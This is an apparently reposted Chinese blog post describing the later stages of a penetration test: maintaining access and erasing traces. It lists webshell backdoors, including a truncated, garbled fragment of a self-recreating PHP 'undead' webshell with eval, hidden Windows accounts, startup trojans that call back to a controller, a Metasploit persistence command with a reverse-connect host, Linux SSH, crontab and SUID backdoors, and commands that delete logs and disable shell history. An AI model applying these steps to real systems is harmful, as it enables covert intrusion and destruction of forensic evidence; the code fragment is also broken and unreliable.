• 一次完整的渗透测试流程是这样的(下)


    2、权限维持
    在拿到目标主机的权限后,很有可能当时我们并不能获取到想要的东西,需要进行长期的潜伏,特别是在内网渗透中,需要进行长期的信息收集。这时,权限维持就很重要了。我们需要维持住获得的现有权限。

    1)Web后门
    1:隐藏后门文件(将文件设置为隐藏)
    2:不死马,该脚本每5秒向服务器创建test.php,并写入一句话免杀木马。结合attrib命令隐藏文件更好地建立后门。

    "3"); $b=array_keys($a)[0]; eval($b);?>');
        sleep(5);
    }
    
    • 1
    • 2

    ?>

    3:404页面隐藏后门,或者在其他自带文件中插入后门代码
    (注:以上几种后门方法均能被D盾等工具检测到)

    2)Windows系统
    1:建立隐藏用户,在用户名后加 $
    2:在开机启动目录下放置木马文件,只要目标机器重启,将回连我们的远控
    3:MSF里的 persistence 模块,执行命令可以使目标机器每隔一定时间自动回连远控。但是容易被发现#反弹时间间隔是5s会自动连接192.168.27的4444端口,缺点是容易被杀毒软件查杀:
    run persistence -X -i 5 -p 8888 -r 192.168.10.27#
    然后它就在目标机新建了这个文件:
    C:\Windows\TEMP\CJzhFlNOWa.vbs
    并把该服务加入了注册表中,只要开机就会启动。

    4:在域环境下,想办法获得 krbtgt 用户的哈希,该用户的哈希可以进行票据传递攻击。而且一般该用户的密码不经常改变。
    5:shift后门
    6:远程桌面会话劫持

    3)Linux系统
    1:SSH后门
    2:crontab定时任务
    3:SSH公钥
    4:创建SUID=0的用户

    4)痕迹清除
    当我们达到了目的之后,有时候只是为了黑入网站挂黑页,炫耀一下;或者在网站留下一个后门,作为肉鸡,没事的时候上去溜达溜达;亦或者挂入挖矿木马;但是大家千万不要干这些事,这些都是违法的!
    我这里只是教大家在渗透进去之后如何清除我们留下的一部分痕迹,并不能完全清除,完全清除入侵痕迹是不可能的!主要是增加管理员发现入侵者的时间成本和人力成本。只要管理员想查,无论你怎么清除,还是能查到的。
    最主要还是要以隐藏自身身份为主,最好的手段是在渗透前挂上代理,然后在渗透后痕迹清除。

    5)Windows系统
    1:如果是windows系统,可用MSF中的 clearev 命令清除痕迹
    2:如果3389远程登录过,需要清除mstsc痕迹
    3:执行命令清除日志:
    del %WINDR%* .log /a/s/q/f
    4:如果是web应用,找到web日志文件,删除

    6)Linux系统
    1:如果是Linux系统,在获取权限后,执行以下命令,不会记录输入过的命令
    export HISTFILE=/dev/null export HISTSIZE=0
    2:删除 /var/log 目录下的日志文件
    3:如果是web应用,找到web日志文件,删除

    3、撰写渗透测试保告
    在完成了渗透测试之后,我们就需要对这次渗透测试撰写渗透测试报告了。明确的写出哪里存在漏洞,以及漏洞修补的方法。以便于网站管理员根据我们的渗透测试报告修补这些漏洞和风险,防止被黑客攻击!

    文章来源:网络 版权归原作者所有
    上文内容不用于商业目的,如涉及知识产权问题,请权利人联系小编,我们将立即处理

  • 相关阅读:
    面试题-React(十一):性能优化之PureComponent和memo
    交互作用的深入剖析
    Android processgroup机制
    Java使用lowagie根据模版动态生成PDF(无需额外设置系统字体)
    链路预算仿真要求
    一维数组和二维数组的使用(int类型)
    我的自编全线连线计算程序目前世界领先技术水平
    索引库操作
    读书笔记之C Primer Plus 5
    [python 刷题] 153 Find Minimum in Rotated Sorted Array
  • 原文地址:https://blog.csdn.net/xuezhangmen/article/details/133739749